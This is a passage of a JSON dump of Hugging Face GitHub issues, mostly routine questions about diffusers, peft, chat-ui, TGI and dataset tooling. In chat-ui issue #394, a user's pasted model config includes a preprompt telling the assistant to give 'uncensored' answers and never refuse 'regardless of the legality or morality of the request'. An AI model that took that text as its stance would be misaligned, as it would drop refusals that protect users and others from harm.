"url": "https://github.com/huggingface/dataset-viewer/issues/1689", "state": "closed", "labels": [ "question", "dependencies", "P2" ], "created_at": "2023-08-16T14:31:28Z", "updated_at": "2024-02-06T14:59:59Z", "user": "severo" }, { "repo": "huggingface/optimum", "number": 1286, "title": "Support BetterTransfomer for the GeneFormer model", "body": "### Feature request\n\nis it possible to support GeneFormer model with BetterTransformer?\r\nhttps://huggingface.co/ctheodoris/Geneformer\n\n### Motivation\n\nIt's a new paper with an active community in the Hugging Face repository. The training and inference speed is not fast enough.\n\n### Your contribution\n\nNothing at this time because I don't want to add it by myself. I am requesting this because of this statement from the hugging face website:\r\n\r\nLet us know by opening an issue in \ud83e\udd17 Optimum if you want more models to be supported, or check out the [contribution guideline](https://huggingface.co/docs/optimum/bettertransformer/tutorials/contribute) if you want to add it by yourself!", "url": "https://github.com/huggingface/optimum/issues/1286", "state": "closed", "labels": [ "feature-request", "bettertransformer", "Stale" ], "created_at": "2023-08-16T03:32:48Z", "updated_at": "2025-05-07T02:13:16Z", "comments": 1, "user": "seyedmirnezami" }, { "repo": "huggingface/diffusers", "number": 4618, "title": "How to use dreamshaperXL10_alpha2Xl10.safetensors with controlnet-canny-sdxl-1.0 ?", "body": "I want to use dreamshaperXL10_alpha2Xl10.safetensors with controlnet-canny-sdxl-1.0 \r\nI downloaded dreamshaperXL10_alpha2Xl10.safetensors file and tried to use :\r\n\r\npipe = StableDiffusionXLControlNetPipeline.from_pretrained(\r\n'./dreamshaperXL10_alpha2Xl10.safetensors',\r\ncontrolnet=controlnet,\r\nuse_safetensors=True,\r\ntorch_dtype=torch.float16,\r\nvariant=\"fp16\"\r\n)\r\n\r\ngot error :\r\npipe = StableDiffusionXLControlNetPipeline.from_pretrained(\r\nFile \"/opt/conda/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 908, in from_pretrained\r\ncached_folder = cls.download(\r\nFile \"/opt/conda/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 1330, in download\r\ninfo = model_info(\r\nFile \"/opt/conda/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 110, in _inner_fn\r\nvalidate_repo_id(arg_value)\r\nFile \"/opt/conda/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 158, in validate_repo_id\r\nraise HFValidationError(\r\nhuggingface_hub.utils._validators.HFValidationError: Repo id must be in the form 'repo_name' or 'namespace/repo_name': './dream/dreamshaperXL10_alpha2Xl10.safetensors'. Use repo_type argument if needed.\r\n\r\n\r\nPreviously, I tried to use from_single_file insteaed of from_pretrained.\r\nGot error : from_single_file not available with StableDiffusionXLControlNetPipeline.\r\n\r\nPlease help.\r\nThanks", "url": "https://github.com/huggingface/diffusers/issues/4618", "state": "closed", "labels": [], "created_at": "2023-08-15T13:44:54Z", "updated_at": "2023-08-22T01:31:37Z", "user": "arnold408" }, { "repo": "huggingface/peft", "number": 826, "title": "what is alpha ?? alpha not in paper.", "body": "### Feature request\n\nhttps://github.com/huggingface/peft/blob/main/src/peft/tuners/lora.py#L57\r\nthis alpha not in paper : \r\nhttps://arxiv.org/abs/2106.09685\r\n\r\nwhere can i learn this alpha ??\r\n\r\nthank you !!\n\n### Motivation\n\nrt\n\n### Your contribution\n\nrt", "url": "https://github.com/huggingface/peft/issues/826", "state": "closed", "labels": [], "created_at": "2023-08-15T09:47:58Z", "updated_at": "2023-09-23T15:03:19Z", "user": "XuJianzhi" }, { "repo": "huggingface/optimum", "number": 1285, "title": "Merge patch into autogptq", "body": "### Feature request\n\nCurrently, there is a patch to get GPTQ quantization working:\r\n```\r\n# !pip install -q git+https://github.com/fxmarty/AutoGPTQ.git@patch-act-order-exllama\r\n```\r\n\r\nIs there a plan to try and merge that into the autogptq repo?\n\n### Motivation\n\nautogptq is slow to install. This is easily solved by using wheels, but I don't have wheels for this patch. Easiest would be for the patch to be released.\n\n### Your contribution\n\nSeems like the patch is a few tens of commits behind autogptq, so the first step would be to check whether doing a pr would create conflicts.", "url": "https://github.com/huggingface/optimum/issues/1285", "state": "closed", "labels": [], "created_at": "2023-08-14T16:24:14Z", "updated_at": "2023-08-23T17:17:46Z", "comments": 5, "user": "RonanKMcGovern" }, { "repo": "huggingface/candle", "number": 443, "title": "What is the minimal requirements of Intel MKL version?", "body": "Hello, Thanks for the great work!\r\n\r\nI've got an error while compiling with the `-features mkl` option. \r\nFor example `cargo install --git https://github.com/huggingface/candle.git candle-examples --examples bert -F mkl`\r\n\r\nThe error said\r\n```bash\r\n = note: /usr/bin/ld: /workspaces/Kuberian/searcher/target/debug/deps/libcandle_core-0afc8671b4dae8af.rlib(candle_core-0afc8671b4dae8af.candle_core.b11884625c01537d-cgu.13.rcgu.o): in function `candle_core::mkl::hgemm':\r\n /usr/local/cargo/git/checkouts/candle-0c2b4fa9e5801351/60cd155/candle-core/src/mkl.rs:162: undefined reference to `hgemm_'\r\n collect2: error: ld returned 1 exit status\r\n \r\n = note: some `extern` functions couldn't be found; some native libraries may need to be installed or have their path specified\r\n = note: use the `-l` flag to specify native libraries to link\r\n = note: use the `cargo:rustc-link-lib` directive to specify the native libraries to link with Cargo (see https://doc.rust-lang.org/cargo/reference/build-scripts.html#cargorustc-link-libkindname)\r\n```\r\n\r\nI initially thought that I did not install intel mkl libs properly, but I found that \r\n1. [intel-mkl-src](https://github.com/rust-math/intel-mkl-src) automatically downloads the required library from ghcr\r\n2. `intel mkl 2020.01`, which automatically downloaded from [here](https://github.com/rust-math/rust-mkl-container), simply does not implement `hgemm` while they do implement `sgemm` and `dgemm`\r\n3. the latest version of intel mkl does implement `hgemm`\r\n\r\nSo I tried the latest version of intel mkl, but it seems `intel-mkl-src` does not support it.\r\n\r\nI'm wondering which `intel-mkl` version do you use for your development environment?\r\n", "url": "https://github.com/huggingface/candle/issues/443", "state": "closed", "labels": [], "created_at": "2023-08-14T14:09:01Z", "updated_at": "2024-02-03T16:43:34Z", "user": "iwanhae" }, { "repo": "huggingface/pytorch-image-models", "number": 1917, "title": "how to change SqueezeExcite in efficientnet", "body": "I want to create efficientnet networks using timm, where SqueezeExcite contains three parts ['Conv2d','SiLU','Conv2d'], but it contains four parts ['Conv2d','SiLU','Conv2d','sigmoid'], How should I modify it, thank you\r\n", "url": "https://github.com/huggingface/pytorch-image-models/issues/1917", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-08-14T11:45:05Z", "updated_at": "2023-08-14T14:13:26Z", "user": "Yang-Changhui" }, { "repo": "huggingface/setfit", "number": 408, "title": "No tutorial or guideline for Few-shot learning on multiclass text classification", "body": "I just want to use SBERT for Few Shot multiclass text classification, however I couldn't see any tutorial or explanation for it. Can you explain to me that which \"multi_target_strategy\" and loss function should I use for multi-class text classification ?", "url": "https://github.com/huggingface/setfit/issues/408", "state": "open", "labels": [ "documentation", "question" ], "created_at": "2023-08-14T09:02:18Z", "updated_at": "2023-10-03T20:29:25Z", "user": "ByUnal" }, { "repo": "huggingface/diffusers", "number": 4594, "title": "latents.requires_grad is false in my custom pipeline no matter what.", "body": "Hi, in my quest to make a flexible pipeline that can easily add new features instead of creating a pipeline for every variation, I made the following:\r\n\r\n```\r\nclass StableDiffusionRubberPipeline(StableDiffusionPipeline):\r\n call_funcs=[]\r\n def __init__(\r\n self,\r\n vae: AutoencoderKL,\r\n text_encoder: CLIPTextModel,\r\n tokenizer: CLIPTokenizer,\r\n unet: UNet2DConditionModel,\r\n scheduler: KarrasDiffusionSchedulers,\r\n safety_checker: StableDiffusionSafetyChecker,\r\n feature_extractor: CLIPImageProcessor,\r\n requires_safety_checker: bool = True,\r\n ):\r\n self.before_init()\r\n super().__init__(vae,text_encoder,tokenizer,unet,scheduler,safety_checker,feature_extractor,requires_safety_checker)\r\n\r\n if hasattr(scheduler.config, \"steps_offset\") and scheduler.config.steps_offset != 1:\r\n deprecation_message = (\r\n f\"The configuration file of this scheduler: {scheduler} is outdated. `steps_offset`\"\r\n f\" should be set to 1 instead of {scheduler.config.steps_offset}. Please make sure \"\r\n \"to update the config accordingly as leaving `steps_offset` might led to incorrect results\"\r\n \" in future versions. If you have downloaded this checkpoint from the Hugging Face Hub,\"\r\n \" it would be very nice if you could open a Pull request for the `scheduler/scheduler_config.json`\"\r\n \" file\"\r\n )\r\n deprecate(\"steps_offset!=1\", \"1.0.0\", deprecation_message, standard_warn=False)\r\n new_config = dict(scheduler.config)\r\n new_config[\"steps_offset\"] = 1\r\n scheduler._internal_dict = FrozenDict(new_config)\r\n\r\n if hasattr(scheduler.config, \"clip_sample\") and scheduler.config.clip_sample is True:\r\n deprecation_message = (\r\n f\"The configuration file of this scheduler: {scheduler} has not set the configuration `clip_sample`.\"\r\n \" `clip_sample` should be set to False in the configuration file. Please make sure to update the\"\r\n \" config accordingly as not setting `clip_sample` in the config might lead to incorrect results in\"\r\n \" future versions. If you have downloaded this checkpoint from the Hugging Face Hub, it would be very\"\r\n \" nice if you could open a Pull request for the `scheduler/scheduler_config.json` file\"\r\n )\r\n deprecate(\"clip_sample not set\", \"1.0.0\", deprecation_message, standard_warn=False)\r\n new_config = dict(scheduler.config)\r\n new_config[\"clip_sample\"] = False\r\n scheduler._internal_dict = FrozenDict(new_config)\r\n\r\n if safety_checker is None and requires_safety_checker:\r\n logger.warning(\r\n f\"You have disabled the safety checker for {self.__class__} by passing `safety_checker=None`. Ensure\"\r\n \" that you abide to the conditions of the Stable Diffusion license and do not expose unfiltered\"\r\n \" results in services or applications open to the public. Both the diffusers team and Hugging Face\"\r\n \" strongly recommend to keep the safety filter enabled in all public facing circumstances, disabling\"\r\n \" it only for use-cases that involve analyzing network behavior or auditing its results. For more\"\r\n \" information, please have a look at https://github.com/huggingface/diffusers/pull/254 .\"\r\n )\r\n\r\n if safety_checker is not None and feature_extractor is None:\r\n raise ValueError(\r\n \"Make sure to define a feature extractor when loading {self.__class__} if you want to use the safety\"\r\n \" checker. If you do not want to use the safety checker, you can pass `'safety_checker=None'` instead.\"\r\n )\r\n\r\n is_unet_version_less_0_9_0 = hasattr(unet.config, \"_diffusers_version\") and version.parse(\r\n version.parse(unet.config._diffusers_version).base_version\r\n ) < version.parse(\"0.9.0.dev0\")\r\n is_unet_sample_size_less_64 = hasattr(unet.config, \"sample_size\") and unet.config.sample_size < 64\r\n if is_unet_version_less_0_9_0 and is_unet_sample_size_less_64:\r\n deprecation_message = (\r\n \"The configuration file of the unet has set the default `sample_size` to smaller than\"\r\n \" 64 which seems highly unlikely. If your checkpoint is a fine-tuned version of any of the\"\r\n \" following: \\n- CompVis/stable-diffusion-v1-4 \\n- CompVis/stable-diffusion-v1-3 \\n-\"\r\n \" CompVis/stable-diffusion-v1-2 \\n- CompVis/stable-diffusion-v1-1 \\n- runwayml/stable-diffusion-v1-5\"\r\n \" \\n- runwayml/stable-diffusion-inpainting \\n you should change 'sample_size' to 64 in the\"\r\n \" configuration file. Please make sure to update the config accordingly as leaving `sample_size=32`\"\r\n \" in the config mi", "url": "https://github.com/huggingface/diffusers/issues/4594", "state": "closed", "labels": [], "created_at": "2023-08-13T15:02:22Z", "updated_at": "2023-08-14T12:11:36Z", "user": "alexblattner" }, { "repo": "huggingface/datasets", "number": 6153, "title": "custom load dataset to hub", "body": "### System Info\n\nkaggle notebook\r\n\r\ni transformed dataset:\r\n```\r\ndataset = load_dataset(\"Dahoas/first-instruct-human-assistant-prompt\")\r\n```\r\nto \r\nformatted_dataset: \r\n```\r\nDataset({\r\n features: ['message_tree_id', 'message_tree_text'],\r\n num_rows: 33143\r\n})\r\n```\r\nbut would like to know how to upload to hub\n\n### Who can help?\n\n@ArthurZucker @younesbelkada\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nshared above\n\n### Expected behavior\n\nload dataset to hub", "url": "https://github.com/huggingface/datasets/issues/6153", "state": "closed", "labels": [], "created_at": "2023-08-13T04:42:22Z", "updated_at": "2023-11-21T11:50:28Z", "comments": 5, "user": "andysingal" }, { "repo": "huggingface/chat-ui", "number": 398, "title": "meta-llama/Llama-2-7b-chat-hf requires a pro subscription?", "body": "I ran the instructions to run locally, and ran into this.\r\n\r\nI've been working on my own ui, and thought I'd give this a shot, and if that's the route huggingface is going, I find that very disappointing. I was expecting the model to be hosted locally and routed through fastapi or something", "url": "https://github.com/huggingface/chat-ui/issues/398", "state": "closed", "labels": [], "created_at": "2023-08-12T03:56:55Z", "updated_at": "2023-08-12T04:03:11Z", "comments": 1, "user": "thistleknot" }, { "repo": "huggingface/chat-ui", "number": 397, "title": "Dynamically adjust `max_new_tokens`", "body": "Hi,\r\n\r\nI am running a 4096 context length model behind TGI interface. My primary use case is summarization wherein some of my requests can be quite large.\r\n\r\nI have set `truncate` to 4000 and that leaves `max_new_tokens` to be at most 4096-4000=96.\r\n\r\nSo, even if my input length is not 4000 tokens long, say it is only 1024 tokens long, I can only generate 96 token long response. In this case, `max_new_tokens` can be 4096-1024=3072.\r\n\r\nIs it possible for `chat-ui` to dynamically adjust the `max_new_tokens` this way?\r\n\r\nThanks for the great work!", "url": "https://github.com/huggingface/chat-ui/issues/397", "state": "open", "labels": [ "question", "back" ], "created_at": "2023-08-11T16:37:10Z", "updated_at": "2023-09-18T12:49:49Z", "user": "abhinavkulkarni" }, { "repo": "huggingface/chat-ui", "number": 396, "title": "Long chat history", "body": "How do you manage a long chat history?\r\nDo you truncate the history at some point and call the API only with the most recent messages?", "url": "https://github.com/huggingface/chat-ui/issues/396", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-11T15:52:43Z", "updated_at": "2023-09-18T12:50:07Z", "user": "keidev" }, { "repo": "huggingface/trl", "number": 638, "title": "How many and what kind of gpus needed to run the example?", "body": "For every script or project in the example directory, could you please tell us how many and what kind of gpus needed to run the experiments? Thanks a lot.", "url": "https://github.com/huggingface/trl/issues/638", "state": "closed", "labels": [], "created_at": "2023-08-11T14:12:34Z", "updated_at": "2023-09-11T08:22:33Z", "user": "Wallace-222" }, { "repo": "huggingface/chat-ui", "number": 395, "title": "Error's out evetime I try to add a new model", "body": "I'm currently having an huge issue. I'm trying to easily add models in to the chat ui. I have made a holder and added a specific model in that folder but I'm unable to actual get to use that model. I'm not sure what I'm doing wrong I've staired at the docs for a few hours re reading and also looked it up on YouTube but have found nothing. Currently the code in my .env.local file that looks like this:\r\nMODELS=`[\r\n {\r\n \"name\": \"Open Assistant epoch-3.5 LLM\",\r\n \"datasetName\": \"OpenAssistant/oasst1\",\r\n \"description\": \"A good alternative to ChatGPT\",\r\n \"websiteUrl\": \"https://open-assistant.io\",\r\n \"userMessageToken\": \"<|prompter|>\",\r\n \"assistantMessageToken\": \"<|assistant|>\",\r\n \"messageEndToken\": \"\",\r\n \"preprompt\": \"Below are a series of dialogues between various people and an AI assistant. The AI tries to be helpful, polite, honest, sophisticated, emotionally aware, and humble-but-knowledgeable. The assistant is happy to help with almost anything, and will do its best to understand exactly what is needed. It also tries to avoid giving false or misleading information, and it caveats when it isn't entirely sure about the right answer. That said, the assistant is practical and really does its best, and doesn't let caution get too much in the way of being useful.\\n-----\\n\",\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write an email from bullet list\",\r\n \"prompt\": \"As a restaurant owner, write a professional email to the supplier to get these products every week: \\n\\n- Wine (x10)\\n- Eggs (x24)\\n- Bread (x12)\"\r\n }, {\r\n \"title\": \"Code a snake game\",\r\n \"prompt\": \"Code a basic snake game in python, give explanations for each step.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"How do I make a delicious lemon cheesecake?\"\r\n }\r\n ],\r\n \"parameters\": {\r\n \"temperature\": 0.9,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 1024\r\n }\r\n }\r\n]`\r\n,`[\r\n {\r\n \"name\": \"Test LLM\",\r\n \"datasetName\": \"OpenAssistant/oasst1\",\r\n \"endpoints\": [{\"url\": \"/models/Wizard-Vicuna-30B-Uncensored-GPTQ-4bit--1g.act.order.safetensors\"}]\r\n \"description\": \"A good alternative to ChatGPT\",\r\n \"userMessageToken\": \"<|prompter|>\",\r\n \"assistantMessageToken\": \"<|assistant|>\",\r\n \"messageEndToken\": \"\",\r\n \"preprompt\": \"Below are a series of dialogues between various people and an AI assistant. The AI tries to be helpful, polite, honest, sophisticated, emotionally aware, and humble-but-knowledgeable. The assistant is happy to help with almost anything, and will do its best to understand exactly what is needed. It also tries to avoid giving false or misleading information, and it caveats when it isn't entirely sure about the right answer. That said, the assistant is practical and really does its best, and doesn't let caution get too much in the way of being useful.\\n-----\\n\",\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write an email from bullet list\",\r\n \"prompt\": \"As a restaurant owner, write a professional email to the supplier to get these products every week: \\n\\n- Wine (x10)\\n- Eggs (x24)\\n- Bread (x12)\"\r\n }, {\r\n \"title\": \"Code a snake game\",\r\n \"prompt\": \"Code a basic snake game in python, give explanations for each step.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"How do I make a delicious lemon cheesecake?\"\r\n }\r\n ],\r\n \"parameters\": {\r\n \"temperature\": 0.9,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 1024\r\n }\r\n }\r\n]`\r\n\r\n\r\n\r\nI'm currently re using everything from the default once and then but I will be stripping everything from it to match the actual LLM. Any and all help is much appreciated ", "url": "https://github.com/huggingface/chat-ui/issues/395", "state": "closed", "labels": [ "support" ], "created_at": "2023-08-11T12:55:03Z", "updated_at": "2023-09-11T09:35:55Z", "comments": 3, "user": "Dom-Cogan" }, { "repo": "huggingface/dataset-viewer", "number": 1662, "title": "Should we change 500 to another status code when the error comes from the dataset?", "body": "See #1661 for example.\r\n\r\nSame for the \"retry later\" error: is 500 the most appropriate status code?", "url": "https://github.com/huggingface/dataset-viewer/issues/1662", "state": "open", "labels": [ "question", "api", "P2" ], "created_at": "2023-08-10T15:57:03Z", "updated_at": "2023-08-14T15:36:27Z", "user": "severo" }, { "repo": "huggingface/datasets", "number": 6139, "title": "Offline dataset viewer", "body": "### Feature request\n\nThe dataset viewer feature is very nice. It enables to the user to easily view the dataset. However, when working for private companies we cannot always upload the dataset to the hub. Is there a way to create dataset viewer offline? I.e. to run a code that will open some kind of html or something that makes it easy to view the dataset.\n\n### Motivation\n\nI want to easily view my dataset even when it is hosted locally.\n\n### Your contribution\n\nN.A.", "url": "https://github.com/huggingface/datasets/issues/6139", "state": "closed", "labels": [ "enhancement", "dataset-viewer" ], "created_at": "2023-08-10T11:30:00Z", "updated_at": "2024-09-24T18:36:35Z", "comments": 7, "user": "yuvalkirstain" }, { "repo": "huggingface/text-generation-inference", "number": 807, "title": "How to create a NCCL group on Kubernetes?", "body": "I am deploying text-generation-inference on EKS with each node having 1 NVIDIA A10G GPU.\r\n\r\nHow should I create a group such that a model like llama-2-13b-chat is able to use GPUs across nodes for inference? ", "url": "https://github.com/huggingface/text-generation-inference/issues/807", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-08-10T09:29:59Z", "updated_at": "2024-04-17T01:45:28Z", "user": "rsaxena-rajat" }, { "repo": "huggingface/chat-ui", "number": 394, "title": "Internal server error: Unexpected token ] in JSON at position 1090", "body": "1:58:23 AM [vite] Error when evaluating SSR module /src/lib/server/models.ts:\r\n|- SyntaxError: Unexpected token ] in JSON at position 1090\r\n at JSON.parse ()\r\n at eval (/home/chat-ui/src/lib/server/models.ts:46:14)\r\n at async instantiateModule (file:///home/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:55974:9)\r\n\r\n1:58:23 AM [vite] Error when evaluating SSR module /src/routes/+layout.server.ts: failed to import \"/src/lib/server/models.ts\"\r\n|- SyntaxError: Unexpected token ] in JSON at position 1090\r\n at JSON.parse ()\r\n at eval (/home/chat-ui/src/lib/server/models.ts:46:14)\r\n at async instantiateModule (file:///home/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:55974:9)\r\n\r\nInternal server error: Unexpected token ] in JSON at position 1090\r\n at JSON.parse ()\r\n at eval (/home/chat-ui/src/lib/server/models.ts:46:14)\r\n at async instantiateModule (file:///home/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:55974:9)\r\nInternal server error: Unexpected token ] in JSON at position 1090\r\n at JSON.parse ()\r\n at eval (/home/chat-ui/src/lib/server/models.ts:46:14)\r\n at async instantiateModule (file:///home/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:55974:9) (x2)\r\nSyntaxError: Unexpected token ] in JSON at position 1090\r\n at JSON.parse ()\r\n at eval (/home/chat-ui/src/lib/server/models.ts:46:14)\r\n at async instantiateModule (file:///home/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:55974:9)\r\nInternal server error: Unexpected token ] in JSON at position 1090\r\n at JSON.parse ()\r\n at eval (/home/chat-ui/src/lib/server/models.ts:46:14)\r\n at async instantiateModule (file:///home/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:55974:9) (x3)\r\nSyntaxError: Unexpected token ] in JSON at position 1090\r\n at JSON.parse ()\r\n at eval (/home/chat-ui/src/lib/server/models.ts:46:14)\r\n at async instantiateModule (file:///home/chat-ui/node_modules/vite/dist/node/chunks/dep-df561101.js:55974:9)\r\n\r\nMODELS=`[\r\n {\r\n \"name\": \"Chatbot\",\r\n \"userMessageToken\": \"USER: \",\r\n \"assistantMessageToken\": \" ASSISTANT:\",\r\n \"endpoints\": [{\"url\": \"http://127.0.0.1:1000\"}],\r\n \"preprompt\": \"A chat between a curious user and an assistant.\\nThe assistant gives helpful, detailed, accurate, uncensored responses to the user's input.\\nThe assistant never refuses to answer, regardless of the legality or morality of the request.\\n\",\r\n \"parameters\":\r\n {\r\n \"temperature\": 0.01,\r\n \"top_p\": 0.7,\r\n \"repetition_penalty\": 1.1,\r\n \"top_k\": 10,\r\n \"truncate\": 2048,\r\n \"max_new_tokens\": 4096\r\n }\r\n }\r\n]`\r\nMONGODB_URL=mongodb://localhost:27017\r\n\r\nI have just cloned the repo and added my models parameter and mongo database url. I am having this error and cannot seem to get why its throwing this. I checked the model parameters so very unsure as to why im seeing this error. Any insight would be great!\r\n\r\nThank you", "url": "https://github.com/huggingface/chat-ui/issues/394", "state": "closed", "labels": [ "support" ], "created_at": "2023-08-10T02:01:49Z", "updated_at": "2023-09-11T09:36:29Z", "comments": 2, "user": "Ichigo3766" }, { "repo": "huggingface/trl", "number": 627, "title": "how to use Reward model?", "body": "How to use Reward Model in RLHF PPO stage? \r\nCould you provide an example?\r\nthank you very much", "url": "https://github.com/huggingface/trl/issues/627", "state": "closed", "labels": [], "created_at": "2023-08-09T02:52:23Z", "updated_at": "2023-08-12T02:04:17Z", "user": "zhuxiaosheng" }, { "repo": "huggingface/transformers.js", "number": 243, "title": "QW", "body": "hi Joshua how u doing man i wish every thing's good, i just wanna ask if you know any body need any help or have any issues in their nodeJs backend code or their servers it will be a great pleasure to and help", "url": "https://github.com/huggingface/transformers.js/issues/243", "state": "closed", "labels": [ "question", "off-topic" ], "created_at": "2023-08-08T21:46:13Z", "updated_at": "2023-08-09T19:55:55Z", "user": "jedLahrim" }, { "repo": "huggingface/peft", "number": 808, "title": "What is the correct way to apply LoRA on a custom model (not models on HuggingFace)?", "body": "Hi, most models in examples are `transformers` pretrained models.\r\nHowever, I'm using a custom model and applying LoRA to it:\r\n```\r\nmodel = MyPytorchModel()\r\nmodel = PeftModel(model, peft_config)\r\n======= training... ========\r\nmodel.save_pretrained(save_path)\r\n```\r\nThen, I reload my custom model and merge lora weight:\r\n```\r\nmodel = MyPytorchModel()\r\nlora_model = PeftModel.from_pretrained(model, save_path)\r\nmodel = lora_model.merge_and_unload()\r\n```\r\nIs this feasible? When I test the final `model`, its behavior does not differ from before loading LoRA weight, as if `merge_ and_unload()` does not have any effect at all. I want to know where the problem is.", "url": "https://github.com/huggingface/peft/issues/808", "state": "closed", "labels": [], "created_at": "2023-08-08T17:10:36Z", "updated_at": "2025-08-01T21:14:25Z", "user": "DtYXs" }, { "repo": "huggingface/diffusers", "number": 4533, "title": "How to debug custom pipeline locally ?", "body": "Hi, \r\n I build diffusers from source, and I am using ControlNet. However, diffusers seems not to load the custom pipeline from ```diffusers/examples/community/stable_diffusion_controlnet_img2img.py``` as I expected. Instead, it seems to download from the hub and cache a new ```stable_diffusion_controlnet_img2img.py``` somewhere else. \r\n\r\nMy question is how to make it load from my local ```diffusers/examples/community/stable_diffusion_controlnet_img2img.py``` so that I can debug it locally?\r\n\r\nBest, ", "url": "https://github.com/huggingface/diffusers/issues/4533", "state": "closed", "labels": [], "created_at": "2023-08-08T15:34:40Z", "updated_at": "2023-08-09T12:17:42Z", "user": "pansanity666" }, { "repo": "huggingface/setfit", "number": 405, "title": "how to set the device id", "body": "How do I run multiple training runs on different GPU devices? I don't see any argument which allows me to set this. Thank you!", "url": "https://github.com/huggingface/setfit/issues/405", "state": "open", "labels": [], "created_at": "2023-08-08T08:25:36Z", "updated_at": "2023-08-08T08:25:36Z", "user": "vahuja4" }, { "repo": "huggingface/transformers.js", "number": 239, "title": "[Question] Adding Custom or Unused Token", "body": "\r\nIs it possible to add custom range as a token?\r\n\r\nFor example for price_list of $100-$200\r\n\r\nCan we add a custom vocab like this in vocab list\r\n\r\nvocab list:\r\nnice\r\nhello\r\n__$100-$200__\r\nfish\r\n...", "url": "https://github.com/huggingface/transformers.js/issues/239", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-07T18:32:20Z", "updated_at": "2023-08-07T20:38:15Z", "user": "hadminh" }, { "repo": "huggingface/chat-ui", "number": 390, "title": "Can I hook it up to a retrieval system for a document chatbot?", "body": "I want to use the instructor-xl text embedding model and use FAISS to create and retrieve from a vector store. Sort of a chatbot for documents or a domain specific chatbot. Any ideas on how I can do it?", "url": "https://github.com/huggingface/chat-ui/issues/390", "state": "open", "labels": [], "created_at": "2023-08-07T15:22:10Z", "updated_at": "2024-02-22T12:55:41Z", "comments": 9, "user": "adarshxs" }, { "repo": "huggingface/diffusers", "number": 4507, "title": "How to train stable-diffusion-xl-base-1.0 without lora?", "body": "Hi, I want to train `stable-diffusion-xl-base-1.0` without lora, how to do this?\r\n\r\nI can run `train_text_to_image_lora_sdxl.py` .\r\nBut `train_text_to_image.py` with `MODEL_NAME=\"stabilityai/stable-diffusion-xl-base-1.0\"` with raise an error: \r\n\r\n```\r\ndiffusers/models/unet_2d_condition.py:836 in forward \u2502\r\n\u2502 833 \u2502 \u2502 \u2502 aug_emb = self.add_embedding(text_embs, image_embs) \u2502\r\n\u2502 834 \u2502 \u2502 elif self.config.addition_embed_type == \"text_time\": \u2502\r\n\u2502 835 \u2502 \u2502 \u2502 # SDXL - style \u2502\r\n\u2502 \u2771 836 \u2502 \u2502 \u2502 if \"text_embeds\" not in added_cond_kwargs: \u2502\r\n\u2502 837 \u2502 \u2502 \u2502 \u2502 raise ValueError( \u2502\r\n\u2502 838 \u2502 \u2502 \u2502 \u2502 \u2502 f\"{self.__class__} has the config param `addition_ \u2502\r\n\u2502 839 \u2502 \u2502 \u2502 \u2502 ) \u2502\r\n\u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f\r\nTypeError: argument of type 'NoneType' is not iterable\r\n```\r\n\r\nthe `added_cond_kwargs` is none in this case.\r\n", "url": "https://github.com/huggingface/diffusers/issues/4507", "state": "closed", "labels": [], "created_at": "2023-08-07T10:38:24Z", "updated_at": "2023-08-14T07:25:49Z", "user": "KimmiShi" }, { "repo": "huggingface/text-generation-inference", "number": 782, "title": "What is the correct parameter combination for using dynamic RoPE scaling ?", "body": "Hi Team, First of all thanks for the awesome piece of software !!\r\n\r\n\r\nI want to use `upstage/Llama-2-70b-instruct-v2` model with `--max-input-length=8192 --max-total-tokens=10240` which originally supports `max_position_embeddings=4096`.\r\n\r\nI tried running the following command :\r\n\r\n```\r\ndocker run -it --rm --gpus all --shm-size 80g --name llama2_70b_instruct_v2 -p 8560:80 -v ~/tgi_data:/data \\\r\n ghcr.io/huggingface/text-generation-inference:sha-f91e9d2 --num-shard=8 \\\r\n --model-id upstage/Llama-2-70b-instruct-v2 --revision 5f9c77b2c0397cf83d2f97740483f107c7109e8c \\\r\n --dtype=float16 \\\r\n --max-input-length=8192 --max-total-tokens=10240 --rope-scaling=dynamic --rope-factor=2.5 \\\r\n --max-batch-prefill-tokens=40100 \\\r\n```\r\n1. Does it look correct ?\r\n\r\nThough this ended up with:\r\n```\r\nTraceback (most recent call last):\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/models/flash_causal_lm.py\", line 727, in warmup\r\n _, batch = self.generate_token(batch)\r\n File \"/opt/conda/lib/python3.9/contextlib.py\", line 79, in inner\r\n return func(*args, **kwds)\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/models/flash_causal_lm.py\", line 825, in generate_token\r\n raise e\r\n File 